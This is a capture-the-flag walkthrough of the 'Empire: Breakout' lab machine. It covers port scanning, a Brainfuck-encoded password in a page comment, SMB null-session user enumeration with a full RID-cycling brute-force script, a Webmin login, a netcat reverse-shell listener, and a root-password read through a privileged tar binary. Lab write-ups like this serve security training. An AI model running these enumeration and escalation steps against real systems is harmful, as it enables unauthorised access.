Port recognition with nmap

┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV empire.vuln -p-   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 13:10 EST
Nmap scan report for empire.vuln (10.0.2.94)
Host is up (0.000073s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
MAC Address: 08:00:27:D3:05:8D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.74 seconds

Nmap reports five open ports: 80 (Apache HTTP server), 139 and 445 (Samba SMB), 10000 (Webmin) and 20000 (Usermin).

┌──(root@ghost)-[/home/ghost]
└─# curl http://empire.vuln/
...
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

After running curl http://empire.vuln/ we see the default Apache page and, inside an HTML comment, a Brainfuck program.

.2uqPEfj3D<P'a-3

Decoded Brainfuck string

┌──(root@ghost)-[/home/ghost]
└─# smbclient -L empire.vuln -N            

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

Listing shares with a null-session login

┌──(root@ghost)-[/home/ghost]
└─# rpcclient -U "" -N empire.vuln
rpcclient $> srvinfo
        BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03
rpcclient $> lsaenumsid
found 6 SIDs

S-1-5-32-550
S-1-5-32-548
S-1-5-32-551
S-1-5-32-549
S-1-5-32-544
S-1-1-0
rpcclient $> lookupnames root
root S-1-22-1-0 (User: 1)
rpcclient $> exit

Enumerating the SMB service over an rpcclient null session: showing server info, listing a few SIDs and looking up common account names.

┌──(root@ghost)-[/home/ghost]
└─# for ((i=0;i<=2000;i++));do rpcclient -U "" -N empire.vuln -c "lookupsids S-1-22-1-$i" | grep -P 'User\\[a-z].*' | sed -e 's/Unix User\\//' | sed -e 's/(1)//';done 
S-1-22-1-0 root 
S-1-22-1-1 daemon 
S-1-22-1-2 bin 
S-1-22-1-3 sys 
S-1-22-1-4 sync 
S-1-22-1-5 games 
S-1-22-1-6 man 
S-1-22-1-7 lp 
S-1-22-1-8 mail 
S-1-22-1-9 news 
S-1-22-1-10 uucp 
S-1-22-1-13 proxy 
S-1-22-1-33 www-data 
S-1-22-1-34 backup 
S-1-22-1-38 list 
S-1-22-1-39 irc 
S-1-22-1-41 gnats 
S-1-22-1-101 systemd-timesync 
S-1-22-1-102 systemd-network 
S-1-22-1-103 systemd-resolve 
S-1-22-1-104 messagebus 
S-1-22-1-999 systemd-coredump 
S-1-22-1-1000 cyber

RID cycling attack: looking up S-1-22-1-0 through S-1-22-1-2000 one RID at a time maps the Unix accounts, and we find a system user called cyber.

┌──(root@ghost)-[/home/ghost]
└─# cat rid-cyklop
#!/bin/bash

# rid-cyklop   by 0bfxgh0st*
# RID Cycling Bruteforce Attack (PoC) script based on rpcclient command (null session)

COL_BLUE="\e[34m"
COL_END="\e[0m"

function GetUsers(){

	if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ];
	then
		printf "%s\n\n" "RID Cycling Bruteforce Attack (PoC)"
		printf "%s\n" "Usage bash rid-cyklop <host> <start> <end>"
		printf "%s\n" "Example bash rid-cyklop empire.vuln 0 700"
		exit
	fi

	host=$1
	start=$2
	end=$3
	name='root'

	# trying to get the SID by running lookupnames on the root user
	get_sid=$(rpcclient -U "" "$host" -N -c "lookupnames $name" | awk '{print $2}')
	if [ -z "$get_sid" ]
	then
		exit
	fi

	# catching the "no such user" error: on failure rpcclient prints "result was ...",
	# so the second column selected by awk '{print $2}' is the string 'was'
	if [ "$get_sid" == 'was' ];
	then
		printf "%s\n" "Cannot find $name in lookupnames"
		exit
	fi

	# keep the domain part of the SID (everything before the last '-'),
	# e.g. S-1-22-1-0 -> S-1-22-1- ; works for any RID length, not only single digits
	sid="${get_sid%-*}-"

	printf "${COL_BLUE}+${COL_END} Bruteforcing SIDs (from $sid$start to $sid$end)\n\n"
	for ((n=$start;n<=$end;n++));
	do
		# a hit looks like "S-1-22-1-33 Unix User\www-data (1)"; keep only the user name
		rpcclient -U "" "$host" -N -c "lookupsids $sid$n" | grep -oP 'User\\[a-z].*' | sed -e 's/User\\//' -e 's/ (1)$//'
	done

}

GetUsers "$1" "$2" "$3"

PoC script automating the RID cycling loop shown above

Logged in at https://empire.vuln:20000 with the user cyber and the password .2uqPEfj3D<P'a-3

Open a terminal from the web interface

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337  
listening on [any] 1337 ...
connect to [10.0.2.15] from empire.vuln [10.0.2.94] 49224
bash: cannot set terminal process group (4404): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ 

After executing a bash reverse shell from that terminal (with our netcat listener set up first) we get a shell as cyber.

cyber@breakout:~$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

User flag

cyber@breakout:~$ ls -l tar
-rwxr-xr-x 1 root root 531928 Oct 19  2021 tar

The root-owned file /home/cyber/tar is executed as root.

cyber@breakout:~$ find / '.bak' 2>/dev/null | grep '\.bak'     
/var/backups/.old_pass.bak
cyber@breakout:~$ ls -l /var/backups/.old_pass.bak
-rw------- 1 root root 17 Oct 20  2021 /var/backups/.old_pass.bak

Looking for files on the system with a .bak extension (find / -name '*.bak' would do the same without the extra grep)

cyber@breakout:~$ ./tar -cf compressed.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ./tar -xf compressed.tar
cyber@breakout:~$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h

Archiving the root-only file with the /home/cyber/tar executable and extracting it as cyber, which leaves a readable copy

cyber@breakout:~$ su root
Password: Ts&4&YurgtRX(=~h
cat /root/rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity

And we are root.